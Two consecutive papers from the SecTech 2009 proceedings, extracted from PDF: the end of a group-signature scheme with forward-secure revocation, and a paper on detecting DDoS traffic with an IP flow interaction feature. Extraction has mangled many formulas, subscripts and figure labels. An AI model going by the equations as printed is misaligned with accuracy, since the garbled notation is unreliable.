the integral ranges Λ = [2λ1 − 2λ2 , 2λ1 + 2λ2 ] and Γ = [2γ1 − 2γ2 , 2γ1 + 2γ2 ]. Note that H : {0, 1}∗ → {0, 1}k is a collision-resistant hash function. The parameter  controls the tightness of the statistical zero-knowledgeness and the parameter lp sets the size of the modulus to use. All these parameters are public. The group manager computes the group public key mpk = (n, a, a0 , y, g, h, g1 , g2 ) and the secret key msk = (p , q  , x) as follows: (a) Select random lp -bit primes p , q  such that p = 2p +1 and q = 2p +1 are prime. Set the modulus n = pq. Note that all the arithmetic operations in the following sections are modulo n unless specified otherwise. (b) Choose random elements a, a0 , g, h, g1 , g2 ∈R QR(n) (of order p q  ), where QR(n) denotes the set of quadratic residues of group Zn∗ . (c) Chooses a random secret x ∈R Zp∗ q , and set y = g x . The membership information is Ω = (c, u), where c is initialized to g1 and u is initialized to 1. 2. G.Enroll The uski , rvki , upki of the new member i are generated as follows: (a) The member i generates a secret exponent x ˜i ∈R [0, 2λ2 ], a random x ˜i r˜i integer r˜i ∈R [0, n] and sends C1 = g h to the group manager and proves his knowledge of the representation of C1 , i.e., sends the signature of knowledge W = SP K[˜ xi , r˜i : C1 = g x˜i hr˜i ](0) (see the construction in [12]). (b) The group manager checks that C1 ∈ QR(n). If this is the case, the group manager selects αi , βi ∈R [0, 2λ2 ] at random and sends (αi , βi ) to member i. (c) Member i computes xi = 2λ1 + (αi x ˜i + βi mod 2λ2 ) in Z and sends the xi group manager the value C2 = a . Member i also proves to the group manager that: i. that the discrete log of C2 with respect to base a lies in Λ, i.e., SP K[xi : C2 = axi ∧ a ∈ Λ](0) (see the construction in [12]). ii. user’s membership secret xi = loga C2 is correctly computed from C1 , αi and βi as follows: ˜i + βi mod 2λ2 , v = (αi x ˜i + βi )/2λ2  in Z A. computes u = αi x and w = αi r˜ in Z and prove that, λ1 B. u lies in [−2λ2 , 2λ2 ] and equals the discrete log of C2 /a2 with λ1 respect to base a, i.e., computes SP K[u : au = C2 /a2 ∧u ∈ [−2λ2 , 2λ2 ]](0) (see the construction in [9]). λ2 C. C1αi g βi equals g u (g 2 )v hw , i.e., computes SP K[αi , βi , u, v, w : λ 2 C1αi g βi = g u (g 2 )v hw ](0) (It is easy to get the construction from [12]).

128

H. Jin, D.S. Wong, and Y. Xu

(d) The group manager checks that C2 ∈ QR(n). If this is the case and all the above proofs were correct, the group manager selects a random prime ei ∈R Γ and computes Ai = (C2 a0 )1/ei = (axi a0 )1/ei . Then the group manager set upki = Ai , rvki = ei . Finally, the group manager sends [Ai , ei ] to Member i. (e) Member i verifies that axi a0 = Aei i . If this is the case, Member i set upki = Ai , rvki = ei and uski = xi . The algorithms Join, Iss are implied by the G.Enroll protocol. 3. G.Revoke On input of rvkk of member k who is to be deleted for this time and the current Ω = (c, μ), the group manager updates c as c = crvkk and updates u as μ = μ  · rvkk . Suppose there are revoked members j, ..., k till now, the k k rvki latest c = g1 i=j and μ = i=j rvki . 4. G.Sign A group signature σ on message m consists of a tuple V˜1 , V˜2 which is generated as follows: (a) Member i computes a signature of knowledge V˜1 = SP K[(r, xi , rvki , i Ai ) : T1 = y r Ai ∧ T2 = g r ∧ T3 = hr g rvki ∧ axi a0 = Arvk ∧ xi ∈ i Λ ∧ rvki ∈ Γ ](m) as shown in Table 1: Table 1. The Constructions of Signature of Knowledge V˜1 1. randomly choose r ∈R {0, 1}2lp and computes T1 = y r Ai , T2 = g r , T3 = g rvki hr 2. randomly choose r1 ∈R ±{0, 1}(γ2 +k) , r2 ∈R ±{0, 1}(λ2 +k) , r3 ∈R ±{0, 1}(γ1 +2lp +k+1) , r4 ∈R ±{0, 1}(2lp +k) and computes: (a) d1 = T1r1 /(ar2 y r3 ), d2 = T2r1 /g3r3 , d3 = g r4 , d4 = g r1 hr4 (b) v = H(g||h||y||a0 ||a||T1 ||T2 ||T3 ||d1 ||d2 ||d3 ||d4 ||m) (c) s1 = r1 − v(rvki − 2γ1 ), s2 = r2 − v(xi − 2λ1 ), s3 = r3 − v · rvki · r, and s4 = r4 − v · r (all in Z) (d) Output (v, s1 , s2 , s3 , s4 , T1 , T2 , T3 )

(b) Member i computes a signature of knowledge V˜2 to prove that his rvki which is committed in T3 is not condensed in c (i.e., not be revoked by the group manager) as follows: k i. Note that c = g1μ , where μ = i=j rvki . Since gcd(rvki , μ) = 1, he can find f, b ∈ Z such that f · μ + b · rvki = 1. Let d = g1−b . ii. With c, f, d, rvki , r, he computes V˜2 = SP K[(rvki , r, f, d) : T3 = hr g rvki ∧ cf = drvki g1 ∧ rvki ∈ Γ ](m) as shown in Table 2.

Efficient Group Signature with Forward Secure Revocation

129

Table 2. The Constructions of Signature of Knowledge V˜2 1. computes T4 = dg2r 2. randomly choose r1 ∈R ±{0, 1}(γ2 +k) , r2 ∈R ±{0, 1}(λ2 +k) , r3 ∈R ±{0, 1}(γ1 +2lp +k+1) , r4 ∈R ±{0, 1}(2lp +k) and computes: (a) d1 = T4r1 /(cr2 g2r3 ), d2 = g r1 hr4 (b) v = H(g||h||g1 ||g2 ||c||T4 ||T3 ||d1 ||d2 ||m) (c) s1 = r1 − v(rvki − 2γ1 ), s2 = r2 − v(xi − 2λ1 ), s3 = r3 − v · rvki · r, and s4 = r4 − vr (all in Z) (d) Output (v, s1 , s2 , s3 , s4 , T4 , T3 ) as V˜2

5. G.Ver To verify a group signature σ = (V˜1 , V˜2 ) on message m and the revocation membership information Ω (actually only c is required), the verifier is to check the validation and correctness of V˜1 , V˜2 with respect to mpk and Ω as follows. s −v2γ1 av T 1 – Verify V˜1 : compute v  = H(g||h||y||a0 ||a||T1 ||T2 ||T3 || 0 1 λ || s −v2γ1 T2 1 g s3

(as2 −v2

1

y s3 )

γ1

||T2v g s4 || T3v g s1 −v2 hs4 ||m).

Return 1 for accept if and only if v = v  , and s1 ∈ ±{0, 1}(γ2+k)+1 , s2 ∈ ±{0, 1}(λ2+k)+1 , s3 ∈ ±{0, 1}(λ1+2lp +k+1)+1 , and s4 ∈±{0, 1}(2lp+k)+1 . Otherwise, return 0 for reject. s −v2γ1 (g−1 )v T 1 – Verify V˜2 : compute v  = H(g||h||g1 ||g2 ||c||T4 ||T3 || 1s −v24λ1 s3 || γ1

(c

2

g2 )

T3v g s1 −v2 hs4 ||m). Return 1 for accept if and only if v = v  , and s1 ∈ ±{0, 1}(γ2+k)+1 , s2 ∈ ±{0, 1}(λ2+k)+1 , s3 ∈ ±{0, 1}(λ1+2lp +k+1)+1 , and s4 ∈ ±{0, 1}(2lp+k)+1 . Otherwise, return 0 for reject. 6. G.Open Given a message-signature pair (m, σ = (V˜1 , V˜2 )) and the trace key tk = x, if G.Ver(mpk, tk, Ω, m, σ) = 1 then output the upki which is computed as upki = T1 /T2x (i.e do the decryption of (T2 , T1 ) which is an ElGamal ciphertext). 4.1

Security Analysis

Correctness and Traceability: If all the algorithms and protocol described above are carried out accordingly, we have signature σ on message m generated as σ ← G.Sign(mpk, upki , uski , rvki , Ω, m) such that G.Ver(mpk, Ω, m, σ) = 1 for ˜ ← G.Open(mpk, tk, Ω, m, σ) such that upk ˜ = upki . all m ∈ {0, 1}∗ and upk 1. The correctness: Since according to the protocol, whenever σ ← G.Sign (mpk, upk, usk, rvk, Ω, m), there always has G.Ver(mpk, Ω, m, σ) = 1 for all m ∈ {0, 1}∗.

130

H. Jin, D.S. Wong, and Y. Xu

2. The traceability: Suppose there is a message and signature pair (m, σ) such that G.Ver(mpk, Ω, m, σ) = 1, where i ← G.Open(mpk, tk, Ω, m, σ). Suppose σ = (V˜1 , V˜2 ), where V˜1 = {T1 , T2 , T3 , ...}. If σ is valid, the validation of V˜1 makes sure that there is a tuple (xi , Ai , ei , r) such that T1 = Ai y r , T2 = g r , T3 = g ei hr , Ai = (axi a0 )1/ei and xi ∈ Λ and ei ∈ Γ . According to [1, Theorem 1], such tuple can only be obtained via the G.Enroll. And according to G.Open, we compute upki = T1 /T2x = Ai . Hence, the Ai can be uniquely linked to an instance of the G.Enroll protocol and thus the user i who originated the signature can be identified. To give a formal security analysis, we also propose a set of security models for group signature with forward secure revocation. The models are based on that proposed by Nakanishi et al. [15]. In the models, we define the notions of unforgeability, anonymity, forward secure revocation and non-frameability. We will provide the security models and proofs in the full version of this paper.

References 1. Ateniese, G., Camenisch, J., Joye, M., Tsudik, G.: A practical and provably secure coalition-resistant group signature scheme. In: Bellare, M. (ed.) CRYPTO 2000. LNCS, vol. 1880, pp. 255–270. Springer, Heidelberg (2000) 2. Ateniese, G., Song, D., Tsudik, G.: Quasi-efficient revocation of group signatures. In: Blaze, M. (ed.) FC 2002. LNCS, vol. 2357, pp. 183–197. Springer, Heidelberg (2003) 3. Ateniese, G., Tsudik, G.: Some open issues and new directions in group signatures. In: Franklin, M.K. (ed.) FC 1999. LNCS, vol. 1648, pp. 196–211. Springer, Heidelberg (1999) 4. Boneh, D., Boyen, X., Shacham, H.: Short group signatures. In: Franklin, M. (ed.) CRYPTO 2004. LNCS, vol. 3152, pp. 41–55. Springer, Heidelberg (2004) 5. Boneh, D., Shacham, H.: Group signatures with verifier-local revocation. In: Proc. CCS 2004, pp. 168–177. ACM, New York (2004) 6. Bresson, E., Stern, J.: Efficient revocation in group signatures. In: Kim, K.-c. (ed.) PKC 2001. LNCS, vol. 1992, pp. 190–206. Springer, Heidelberg (2001) 7. Camenisch, J., Groth, J.: Group signatures: Better efficiency and new theoretical aspects. In: Blundo, C., Cimato, S. (eds.) SCN 2004. LNCS, vol. 3352, pp. 120–133. Springer, Heidelberg (2005) 8. Camenisch, J., Lysyanskaya, A.: Dynamic accumulators and application to efficient revocation of anonymous credentials. In: Yung, M. (ed.) CRYPTO 2002. LNCS, vol. 2442, pp. 101–120. Springer, Heidelberg (2002) 9. Camenisch, J., Michels, M.: Separability and efficiency for generic group signature schemes. In: Wiener, M. (ed.) CRYPTO 1999. LNCS, vol. 1666, pp. 413–430. Springer, Heidelberg (1999) 10. Camenisch, J., Stadler, M.: Efficient group signature schemes for large groups. In: Kaliski Jr., B.S. (ed.) CRYPTO 1997. LNCS, vol. 1294, pp. 410–424. Springer, Heidelberg (1997) 11. Chaum, D., van Heyst, E.: Group signatures. In: Davies, D.W. (ed.) EUROCRYPT 1991. LNCS, vol. 547, pp. 257–265. Springer, Heidelberg (1991)

Efficient Group Signature with Forward Secure Revocation

131

12. Damg˚ ard, I., Fujisaki, E.: A statistically-hiding integer commitment scheme based on groups with hidden order. In: Zheng, Y. (ed.) ASIACRYPT 2002. LNCS, vol. 2501, pp. 125–142. Springer, Heidelberg (2002) 13. Fiat, A., Shamir, A.: How to prove yourself: Practical solutions to identification and signature problems. In: Odlyzko, A.M. (ed.) CRYPTO 1986. LNCS, vol. 263, pp. 186–194. Springer, Heidelberg (1987) 14. Kim, S.J., Park, S.J., Won, D.H.: Convertible group signatures. In: Kim, K.-c., Matsumoto, T. (eds.) ASIACRYPT 1996. LNCS, vol. 1163, pp. 311–321. Springer, Heidelberg (1996) 15. Nakanishi, T., Fujii, H., Hira, Y., Funabiki, N.: Revocable group signature schemes with constant costs for signing and verifying. In: Jarecki, S., Tsudik, G. (eds.) PKC 2009. LNCS, vol. 5443, pp. 463–480. Springer, Heidelberg (2009) 16. Nakanishi, T., Funabiki, N.: Verifier-local revocation group signature schemes with backward unlinkability from bilinear maps. In: Roy, B. (ed.) ASIACRYPT 2005. LNCS, vol. 3788, pp. 533–548. Springer, Heidelberg (2005) 17. Nakanishi, T., Sugiyama, Y.: A group signature scheme with efficient membership revocation for reasonable groups. In: Wang, H., Pieprzyk, J., Varadharajan, V. (eds.) ACISP 2004. LNCS, vol. 3108, pp. 336–347. Springer, Heidelberg (2004)

Detecting Distributed Denial of Service Attack Based on Multi-feature Fusion Jieren Cheng1,2, Jianping Yin1, Yun Liu1, Zhiping Cai1, and Chengkun Wu1 1

School of Computer, National University of Defense Technology, 410073 Changsha, China 2 Department of Mathematics, Xiangnan University, 423000 Chenzhou, China [email protected]

Abstract. Detection of Distributed denial of service (DDoS) attacks is currently a hot topic in both industry and academia. We present an IP flow interaction algorithm (IFI) merging multi-feature of normal flow and DDoS attack flow. Using IFI time series describe the state of network flow, we propose an efficient DDoS attack detection method based on IFI time series (DADF). DADF employs an adaptive parameter estimate algorithm and detects DDoS attack by associating with the states of IFI time series and an alert evaluation mechanism. Experiment results demonstrate that IFI can well fuse the multiple features of normal flow and DDoS attack flow and it is efficient to be used to distinguish normal flow from DDoS attack flow; DADF can fast detect DDoS attack with higher detection rate and lower false alarm rate under relatively large normal background flows. Keywords: Network Security, Distributed Denial of Service, Normal Profile, Multi-feature Fusion.

1 Introduction Distributed Denial of Service (DDoS) attack is one of the main threats that the Internet is facing. DDoS attacks are currently tending to use actual source IP address [1] and simulate normal flows to perform an attack, and make serious destroy on the victims by flooding traffic or using periodically low-rate attack flows [2]. Furthermore, at an early stage of a DDoS attack, the traffic changes are difficult to detect because low traffic fluctuations are not obvious. Many approaches focus on the study of [3,4,5] based on flow dissymmetry can detect dissymmetric attack flows, but the in and outgoing traffic of normal flow are highly disproportional sometimes. It is more expensive and difficult to implement cooperatively at the edge networks. Moreover, attacker may use random spoofed source IP address, or simulate normal flow to send out attack packets and make that the attack traffic from each source network can be within normal range and unnoticed compared with legitimate traffic flows. Thus detecting attack traffic accurately can be difficult or impossible at the source network. [6] detected DDoS attack using the distribution of IP addresses; [7,8] detected attack based on the abrupt traffic change; to avoid the shortcoming of the methods based on single attack characteristic D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 132–139, 2009. © Springer-Verlag Berlin Heidelberg 2009

Detecting Distributed Denial of Service Attack Based on Multi-feature Fusion

133

[9,10,11] integrated multiple characteristics to detect DDoS attack. However, the methods are disturbed by relatively large volume of normal background flows. The distributed collaborative methods [12,13] employed distributed sensors to detect the attacks collaboratively, but it is difficult to deploy the system and the detection quality of the system relies on the capability of detection of each sensor. Based on normal flow feature, [14] established detection models and could detect different kinds of attacks. However, it is very difficult to build a stable model for all kinds of normal flows. Moreover, the attackers may launch an attack by simulating the normal flows. Hence, detection of DDoS attacks is a challenging task requiring novel approaches. This paper presents an IP Flow Interaction algorithm based on multi-feature of normal flow and DDoS attack (IFI) and proposes a DDoS attack detection method based on IFI time series (DADF). Theoretical analysis and experiment results demonstrate that: IFI algorithm makes use of multiple features effectively and can reflect the difference feature between normal flow and DDoS flow; DADF can well use IFI feature time series of network flows to detect DDoS attack with higher detection rate and lower false alarm rate.

2 IFI Algorithm The common characteristic of normal flows and attack flows is the interaction. However, because of the difference of their interaction purpose, their statistic features on IP addresses and ports are essentially different. Assume a network flow F in a certain time period T is described as <(t1,s1,sp1,d1,dp1), (t2,s2,sp2,d2,dp2),…, (tn,sn,spn,dn,dpn)>, where i=1,2,…,n, ti means the timestamp of the ith packet, si, spi, di, dpi represent the source IP address, the source port, the destination IP address and the destination port of the ith packet. Definition 1. Classify the n packets and make the packets with the same source IP address and destination IP address in the same class. Denote the class with the source IP address Ai as IPS(Ai), and denote the class with the destination IP address Aj as IPD(Aj). If there is a source IP address Ai in class IPS(Ai) makes class IPD(Ai) nonempty, then IPS(Ai) is called an Interaction Flow (IF and denoted as IF(Ai). If there is a source IP address Ai in class IPS(Ai) makes class IPD(Ai) empty, then IPS(Ai) is called a Source Half Interaction Flow (SH and denoted as SH(Ai). If there is a destination IP address Ai in class IPD(Ai) makes class IPS(Ai) empty, then IPD(Ai) is called a Destination Half Interaction Flow (DH and denoted as DH(Ai). Flow SH and flow DH are all called Half Interaction Flow (HF). The normal flows are most IFs with Interaction per unit time and obey the TCP congestion control protocol to evade congestion, even if a website server sustains a flash crowd. Hence, in a time period T the number M of all IFs is large, while the number S of all SHs and the number D of all DHs are relatively small, thus |S-D|/M→0. However, the successful DDoS attack flows are most HFs per unit time, because the DDoS attack keeps from network service by continually sending out a great

）

）

）

134

J. Cheng et al.

number of attack packets and does not obey the TCP congestion control protocol, especially when the attacker perform a DDoS attack with spoofing source IP addresses. For all the HFs, when source-to-destination address is many-to-one dissymmetry, the number S of all SHs and the number D of all DHs have S>D. Furthermore, in a time period T S is large because of distribution of attack source address and abrupt traffic change and D is relatively small due to concentrated target, while the number M of all IFs is small, thus |S-D|/M→∞. Additionally, when sourceto-destination address is one-to-many dissymmetry at the early stage of indirect DDoS [11], in T S is small due to concentrated target and D is large because of distribution of attack source address and abrupt traffic change, if M is small, thus |S-D|/M→∞. Furthermore, the number of difference port number Port(SH(Aj))>θ/ms or Port(DH(Ai)) >θ/ms, θ is the threshold. When the attack flow is small, but the normal background flows are relatively large, the detection quality is affected. In order to reduce the interference of IFs and improve the detection sensitivity for attack flows, we define Source Address Entropy (SAE), which can reflect the distribution of source addressed of IFs [6]. Definition 2. Classify the n packets and get all the interaction flow IFs of F as IF1, IF2,…, IFm. The number of packets with a source IP address Ai in IFi is denoted as sipi, where i=1,2,…,m. The number of the packets of all the IFs is denoted as ASIP. All the source half interaction flow SHs of F are denoted as SH1, SH2,…, SHS, the amount of different source port number of class SHi is denoted as Port(SHi), i=1,2,…,S. All the destination half interaction flow DHs are denoted as DH1, DH2,…, DHD, the amount of different destination port number of class DHi is denoted as Port(DHi), i=1,2,…,D. The SAE is defined as: m

SA E = − ∑ i =1

sip i sip i log 2 ( ) A SIP A SIP

(1)

we give the IP Flow Interaction Feature (IFI) algorithm merging multi-feature, which is flow interaction, source-to-destination address dissymmetry, distribution of attack source address, concentrated target and abrupt traffic change, as follow: Definition 3. The IFI is defined as: S

IF I F =

f ( S A E )(| S − D | + ∑ w eig h t ( P o rt ( S H i )) + i =1

D

∑ w eig h t ( P o rt ( D H j =1

j

)))

(2)

m +1

in which Where f ( x) = ⎧ x x > 1 weight ( x) = ⎧ x x /Δt > θ Δt is the sampling time period, ⎨ ⎨ ⎩1 x ≤ 1 , ⎩ 0 x /Δt ≤ θ , θ is the threshold resulting from normal flow by statistic method, which can be the maximum of port number of a HF flow in Δt. It is very difficult or impossible to translate a large number of attack flows with half interaction into IF flows per unit time out of the source network. Consequently, IFI is efficient for distinguishing normal flow from DDoS attack flow.

Detecting Distributed Denial of Service Attack Based on Multi-feature Fusion

135

3 DDoS Attack Detection Method When the attack flows are relatively small versus massive normal background flows, IFI will be small. Contrarily, because network noises or other non-attack uncertainty may lead to a loss of packets, delay or dithering, IFI of the normal flows will have abnormal changes at some times. Hence, we propose an efficient detection method based on IFI Time series (DADF). 3.1 DDoS Attack Detection Model Assume that the slide detection window size is W, sampling time period is Δt, the sampled IFI time series of network flow F are a1, a2,…, aW, and the attack threshold is H. G(x,y) present x>y, F(x) present x is an abnormal value, and the FDD(IFI-based DDoS Attack Detection Model) is defined as: ∀i, i ≥ W , G (ai − w+1 , H ) ∧ G (ai − w+ 2 , H ) ∧ " ∧ G (ai , H ) → F (ai )

(3)

∀i, i > 1, F ( ai −1 ) ∧ G ( ai , H ) → F ( ai )

(4)

Rule (3) present that ai is abnormal value if each ai (i=1,2,…,W) exceeds H. Rule (4) present ai is abnormal value if ai-1 is abnormal value and ai exceeds H. Rule (3) is the premise of rule (4), and rule (4) can help to decrease the number of judgment of the detection system. In real-time applications, the sliding detection window will move forward once when the detection for a current IFI is completed. 3.2 Adaptive Parameter Estimate Algorithm In real applications, it is hard to specify manually the proper parameters in FDD because of the differences of sampling time interval, all kinds of normal traffic, network environments and application requirements. We present an adaptive parameter estimate algorithm. Algorithm 1. The adaptive parameter estimate algorithm Input: an initial sample A, R of smoothing A, the average value RMean of R, the maximum value RMax of R, a stopping criterion C, a ideal false alarm rate IFA. Output: sliding detection window size W, attack threshold H, real false alarm rate RFA, the graph about the change of RFA with the increase of H. processing procedure: 1. Initialization-related variables; 2. While (criterion C is not satisfied){ 3. Initialization-related variables; 4. H=RMean; 5. While (RFA < FA and H≤ Max ){ 6. Detecting sample A using FDD model; 7. Calculate the real false alarm rate RFA; 8. H= H +RMean; 9. return H, RFA;} 10. W=W+1; 11. return W;}

136

J. Cheng et al.

Sample the normal network flow F with a time interval Δt, and calculate the IFI of each sampling, after N times, a time series sample of IFI is obtained, A(N,Δt)={ IFIi,i=1,2,…,N}, N is the length of the series. Let IFIi=ai, i=1,2,…,N, then use the locally weighted linear regression smoothing method (Loess) [15] to smooth sample and eliminate the random noises of sample A. Loess is a locally weighted scatter plot smooth using linear least squares fitting and a second-degree polynomial. We specify the span of Loess as 2*W+1(W is the size of sliding detection window). Assume a1, a2,…, an are transformed into r1, r2,…, rm by Loess smoothing method, calculate the average value of denoted as RMean, and calculate the maximum value of denoted as RMax. A network flow state is defined as the normal state when IFI≤ Mean, the quasi-abnormal state when Mean Max. If the size of attack threshold can be designated between Mean and Max, namely detecting attack in quasi-abnormal state, the detection rate will increase drastically. However, the premise is that false alarm rate must be in the viable span. The process of the adaptive parameter estimate algorithm is given in algorithm 1. 3.3 Alert Evaluation Mechanism The cause of abnormal changes in IFI states of network flows includes the DDoS attack as well as congestion and some other reasons. Hence, our detection system employs alert evaluation mechanism based on the alert frequency and time interval. when the U (U≥1) anomalies value are detected in a specified time interval ΔT (ΔT≥0), the system will generate an alarm. The setting value of ΔT and U may be set dynamically according to the network security situations, because larger ΔT and U can decrease the risk of false alarm rate, but the time efficiency will be decrease too.

4 Experiments and Results The experiment used the normal flow data in 1999 and DDoS flow data LLDoS2.0.2 in 2000 from MIT Lincoln lab [16]. 4.1 Feature The IFI time series and the number of packets (size of traffic) of corresponding traffic of the normal flows were obtained by multiple sampling and calculation depicted in figure 1. Similarly, the results of the abnormal flows were depicted in figure 2. From figure 1 & figure 2, we can see that, IFI time series are sensitive to attack flows and they can magnify for the attack flow using randomized destination ports, while they are steady and small for the normal flows. As depicted in figure 2, there are few IFIs which size is smaller than the size of attack traffic, and the main reason is that the few normal flows responded become IFs in a certain Δt. So the sampling period can influence the IFI state of abnormal flows containing DDoS attack flow, it can be designated a proper size according to the quality of network service.

Detecting Distributed Denial of Service Attack Based on Multi-feature Fusion 1

1

25

0.8

15

0.6

10

0.2 0

0

1 2 3 4 Time Sample Point(1/0.01s) 4 x 10

0.4

50

0.2

5 0

Size of Normal Traffic 100 Size

0.4

20

Size

Size

Size

0.6

150 IFI of Normal Flow

Size of Normal Traffic

IFI of Normal Flow 0.8

137

0

0

1 2 3 4 Time Sample Point(1/0.01s) 4 x 10

0

0

1 2 3 4 Time Sample Point(1/0.1s) 4 x 10

0

1 2 3 4 Time Sample Point(1/0.1s) 4 x 10

Fig. 1. IFI time series and traffic of 1999 normal flow 1500

100 IFI of Normal Flow IFI of Attack Flow

150

800

Size of Normal Traffic Size of Attack Traffic

80

600

100 50 0

IFI of Normal Flow IFI of Attack Flow

Size

Size

Size

1000

60 40

Size

200

500 200

20

0

0

1000 2000 3000 4000 Time Sample Point(1/0.01s)

Size of Normal Traffic Size of Attack Traffic

400

0

0

1000 2000 3000 4000 Time Sample Point(1/0.01s)

0

0

500 1000 1500 Time Sample Point(1/0.1s)

0

500 1000 1500 Time Sample Point(1/0.1s)

Fig. 2. IFI time series of LLDoS2.0.2-Inside network flow 150

1400

700

1200

600

1000

500

800

400

70

Size of Normal Traffic Size of Attack Traffic

Size

IFI of Normal Flow IFI of Attack Flow

Size

50 Size

100

40 30

600

20

400

50

200

10 0

1

1.1 1.2 1.3 1.4 Time Sample Point(1/0.01s) 4 x 10

0

1

1.1 1.2 1.3 1.4 Time Sample Point(1/0.01s) 4 x 10

0 3000

Size

60

300 Size of Normal Traffic Size of Attack Traffic

200 IFI of Normal Flow IFI of Attack Flow 3500 4000 Time Sample Point(1/0.1s)

100 0 3000

3500 4000 Time Sample Point(1/0.1s)

Fig. 3. IFI time series of LLDoS2.0.2-Outside network flow

We obtained attack flows from attack flow data LLSDDOS2.0.2-Outside.dump, and simulated the attack flows sent by “Zombie” in indirect DDoS attack. Figure 3 shows that, for indirect DDoS attack, IFI is sensitive to attack flows and can magnify because of randomized source ports used. 4.2 Performance Comparison We compared IFI algorithm with previous similar works, one of which is the Entropy of Feature Distributions (EFD) method [6]. Setting sampling period Δt to 0.1s, we obtained the IFI and EFD time series of normal flows respectively; alternately, mixing the normal flows with attack flows we obtained the IFI and EFD time series of abnormal flows respectively. As depicted in figure 4, the vertical axis represents the detection rate and the false positive rate, the horizontal axis represents the amount of normal packets divides the amount of attack packets. The detection results of IFI based on SVM classifier and EFD based on SVM classifier are shown in figure 4. As the background network flows increase, the detection rate of IFI method drop from 100% to 99.8%, the average detection rate is 99.9%. The results demonstrate that IFI method can effectively identify the abnormal flows, and is insensitive to large normal background

100 80 60

False Alarm Rate of IFI Detection Rate of IFI False Alarm Rate of EFD Detection Rate of EFD

40 20 0

1

2

3

4 5 6 7 8 Increase Multiple of Network Flow

9

10

False Alarm Rate and Detection Rate• %•

J. Cheng et al. False Alarm Rate and Detection Rate• %•

138

100 False Alarm Rate of IFI Based on SVM Detection Rate of IFI Based on SVM False Alarm Rate of IFI Based on FDD Detection Rate of IFI Based on FDD

80 60 40 20 0

1

2

3

4 5 6 7 8 Increase Multiple of Network Flow

9

10

Fig. 4. Compare of different algorithm Fig. 5. Compare of different detection method

flows, so it can be deployed on attack source, media and terminal equipments to detect attack. The main reasons for false negative are the network state shift caused by network random noise. The false alarm rate of IFI method increases from 0.0% to 2.5%, with an average false alarm rate 2.1%. The results show that IFI method can accurately identify normal flow and will not lead to high false positive with large normal flows. The main reasons for false positive are from two aspects: (1) The random network noise; (2) Network delay and packet lost. EFD is designed to extract distributed IP addresses features of DDoS attack using four-dimensional characteristic vector and calculate the features value without distinguishing the normal flows from attack flows. But IFI is designed to extract the multi-feature of normal flow and DDoS attack flow using one-dimensional characteristic vector and it can help to separate attack flows and normal flows effectively and calculate their characteristic values respectively so as to reduce the interference of normal flows effectively. By comparison, IFI method has a lower false negative and false positive, and IFI algorithm is efficient for DDoS attack detection. We compared DADF method with IFI-based SVM method under the same condition above. Furthermore, for the fairness to both methods, the abnormal alert time interval ΔT was set to zero and the number of anomalies U was set to one. The results are shown in figure 5 For DADF method, the detection rate is 100% for each test, as the background network flows increase, the false alarm rate of DADF method increases from 0.0% to 0.1%, which average false alarm rate is 0.1%. The results show that DADF method has higher detection rate and lower false alarm rate compared with IFI-based SVM method. IFI-based SVM method detected the IFI of current network flows in isolation, but DADF method detected the IFI of current network flows by associating with the states of IFI time series, which sliding detection window size W was three in this experiment. In summary, IFI can be used to distinguish normal flow from DDoS attack flow. DADF can effectively detect DDoS attack under larger normal background flows.

5 Conclusions DDoS attacks can cause severe disruption to the stability of the Internet. In this paper, we propose an IFI algorithm based on multi-feature fusion. Using IFI time series describe the state of network flow, we propose an efficient DDoS attack detection method based on IFI time series (DADF). DADF obtains its model parameters from the training samples of normal flows by an adaptive parameter estimate algorithm and

Detecting Distributed Denial of Service Attack Based on Multi-feature Fusion

139

detects DDoS attack by associating with the states of IFI time series and an alert evaluation mechanism. Analyses and experiment results show that: IFI can be used to identify DDoS attack flow; DADF can fast detect DDoS attack with higher detection rate and lower false alarm rate under relatively large normal background flows. In the future, we will explore on how to use our method to defense the DDoS attacks. Acknowledgments. This work is supported by National Science Foundation of China (60970034, 60603062, 60603015), Scientific Research Fund of Hunan Provincial Education Department (07C718), the Foundation for the Author of National Excellent Doctoral Dissertation (2007B4), Science Foundation of Hunan Provincial (06JJ3035), Application of Innovation Plan Fund of the Ministry of Public Security (2007YYCXHNST072).

References 1. Handley, M.: DoS-resistant Internet subgroup report. Internet Architecture WG (2005) 2. Macia, G., Diaz, J.E., Garcia, P.: Evaluation of a low-rate DoS attack against application servers. Computers & Security 27(7-8), 335–354 (2008) 3. Abdelsayed, S., Glimsholt, D., Leckie, C., et al.: An efficient filter for denial-of service bandwidth attacks. In: Proceedings of the 46th IEEE GLOBECOM, pp. 1353–1357 (2003) 4. Wang, H., Zhang, D., Shin, K.G.: Detecting SYN flooding attacks. In: Proceedings of IEEE INFOCOM 2002, pp. 1530–1539 (2002) 5. Mirkovic, J., Wang, M., Reither, P., et al.: Save: Source address validity enforcement protocol. In: Proceedings of IEEE INFOCOM 2002, pp. 1557–1566 (2002) 6. Lakhina, A., Crovella, M., Diot, C.: Mining Anomalies Using Traffic Feature Distributions. In: Proceedings of ACM SIGCOMM, Philadelphia, Pennsylvania, USA (2005) 7. Cheng, C.M., Kung, H.T., Tan, K.S.: Use of spectral analysis in defense against DoS attacks. In: Proceedings of IEEE GLOBECOM 2002, pp. 2143–2148 (2002) 8. Lakhina, A., Crovella, M., Diot, C.: Diagnosing Network-Wide Traffic Anomalies. In: Proceedings of ACM SIGCOMM, Portland, Oregon, USA (August 2004) 9. Cheng, J., Yin, J., Liu, Y., et al.: Detecting Distributed Denial of Service Attack Based on Address Correlation Value. Journal of Computer Research and Development (2009) 10. Cheng, J., Yin, J., Liu, Y., et al.: DDoS attack detection Algorithm using IP Address Features. In: Deng, X., Hopcroft, J.E., Xue, J. (eds.) FAW 2009. LNCS, vol. 5598. Springer, Heidelberg (2009) 11. Cheng, J., Yin, J., Wu, C., et al.: DDoS Attack Detection Method Based on Linear Prediction Model. In: Huang, D.-S., et al. (eds.) ICIC 2009. LNCS, vol. 5754, pp. 1004– 1013. Springer, Heidelberg (2009) 12. Chen, Y., Hwang, K., Ku, W.-S.: Collaborative Detection of DDoS Attacks over Multiple Network Domains. IEEE Trans. on Parallel and Distributed Systems (2007) 13. Chen, F., Zhou, V., Leckie, C., et al.: Decentralized multi-dimensional alert correlation for collaborative intrusion detection. Journal of Network and Computer Applications (2009) 14. Manikopoulos, C., Papavassiliou, S.: Network intrusion and fault detection: A statistical anomaly approach. IEEE Commun. Mag. 40(10), 76–82 (2002) 15. Cleveland, W.S., Devlin, S.J.: Locally Weighted Regression: An Approach to Regression Analysis by Local Fitting. Journal of the American Statistical Association (1988) 16. 